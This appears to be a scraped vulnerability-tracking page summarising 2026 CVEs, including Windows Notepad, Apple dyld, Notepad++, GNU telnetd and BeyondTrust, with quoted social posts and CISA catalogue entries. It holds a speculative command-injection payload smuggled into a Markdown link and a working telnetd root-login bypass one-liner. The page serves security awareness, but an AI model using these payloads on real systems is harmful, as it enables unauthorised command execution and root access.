Overview
- Microsoft
- Windows Notepad
Description
Statistics
- 8 Posts
- 7 Interactions
Fediverse
clown world
https://www.cve.org/CVERecord?id=CVE-2026-20841
@odo
From https://www.cve.org/CVERecord?id=CVE-2026-20841
> Improper neutralization of special elements used in a command ('command injection') […]
So maybe notepad just runs something like
```cmd
start "" $link_src
```
And when you write something like
```md
[trust me bro](mailto:foo@bar.baz & echo u pwnd)
```
in your md ...
It maybe translates to something like
```cmd
start "" mailto:foo@bar.baz & echo u pwnd
```
I don't know what the actual vuln is. But sounds like something like the above. Hopefully not that simple. 🤞
Bluesky
Description
Statistics
- 10 Posts
- 5 Interactions
Fediverse
🚨 CRITICAL: CVE-2026-20700 impacts Apple macOS, iOS, iPadOS & more before v26.3. Memory corruption enables arbitrary code execution — exploited in sophisticated, targeted attacks. Urgently update all devices! https://radar.offseq.com/threat/cve-2026-20700-an-attacker-with-memory-write-capab-30065920 #OffSeq #AppleSecurity #CVE202620700 #ThreatIntel
Apple updates everything 2026-02
Apple's regular updates in February patch 71 security vulnerabilities. Some of them are present in several Apple products. Notable is CVE-2026-20700, which is already being exploited in attacks (zero-day). A further three new vulnerabilities affect speech recognition (Siri), since they allow personal data to be elicited even from a locked iPhone
https://www.pc-fluesterer.info/wordpress/taxopress_logs/apple-aktualisiert-alles-2026-02/
The vulnerability, tracked as CVE-2026-20700 (CVSS score: N/A), has been described as a memory corruption issue in dyld, Apple's Dynamic Link Editor. https://thehackernews.com/2026/02/apple-fixes-exploited-zero-day.html
Update your iPhones to iOS 26.3, CVE-2026-20700 is pretty bad!
https://go.theregister.com/feed/www.theregister.com/2026/02/12/apple_ios_263/
‼️ CISA has added 3 vulnerabilities to the KEV Catalog
CVE-2025-15556: Notepad++ Download of Code Without Integrity Check Vulnerability: Notepad++ when using the WinGUp updater, contains a download of code without integrity check vulnerability that could allow an attacker to intercept or redirect update traffic to download and execute an attacker-controlled installer. This could lead to arbitrary code execution with the privileges of the user.
CVE-2026-20700: Apple Multiple Buffer Overflow Vulnerability: Apple iOS, macOS, tvOS, watchOS, and visionOS contain an improper restriction of operations within the bounds of a memory buffer vulnerability that could allow an attacker with memory write capability to execute arbitrary code.
CVE-2024-43468: Microsoft Configuration Manager SQL Injection Vulnerability: Microsoft Configuration Manager contains an SQL injection vulnerability. An unauthenticated attacker could exploit this vulnerability by sending specially crafted requests to the target environment which are processed in an unsafe manner enabling the attacker to execute commands on the server and/or underlying database.
Bluesky
Overview
Description
Statistics
- 3 Posts
- 105 Interactions
Fediverse
I'm just reading this GNU telnetd CVE from last month. I did not realize that telnet was still a thing, but it turns out anybody could provide a username of "-f root" and, boom, they had root. The vulnerability existed for 11 years. *Wow*. https://www.cve.org/CVERecord?id=CVE-2026-24061
USER='-f root' telnet -a ur.momma
root@ur.momma:~# got em!
https://www.cve.org/CVERecord?id=CVE-2026-24061
https://lists.gnu.org/archive/html/bug-inetutils/2026-01/msg00004.html
Overview
Description
Statistics
- 2 Posts
- 4 Interactions
Fediverse
https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3
Overview
- checkpoint
- Harmony SASE
Description
Statistics
- 2 Posts
Fediverse
https://blog.amberwolf.com/blog/2026/january/advisory---check-point-harmony-local-privilege-escalation-cve-2025-9142/
/via @badsectorlabs
Overview
- nyariv
- SandboxJS
Description
Statistics
- 2 Posts
Overview
Description
Statistics
- 2 Posts
- 14 Interactions
Overview
- BeyondTrust
- Remote Support(RS) & Privileged Remote Access(PRA)
Description
Statistics
- 2 Posts
- 14 Interactions
Fediverse
It took less than a day. A PoC for BeyondTrust CVE-2026-1731 hit GitHub, and GreyNoise immediately started seeing reconnaissance from multi-exploit actors hiding behind VPNs + custom tooling. See what our data reveals about who’s mapping targets + how.
🔗 https://www.greynoise.io/blog/reconnaissance-beyondtrust-rce-cve-2026-1731
Overview
Description
Statistics
- 2 Posts
- 3 Interactions
Fediverse
2 vulnerabilities in HAProxy have been fixed:
CVE-2026-26080 and CVE-2026-26081. DoS affecting QUIC
https://www.haproxy.com/blog/cves-2026-quic-denial-of-service
Overview
Description
Statistics
- 3 Posts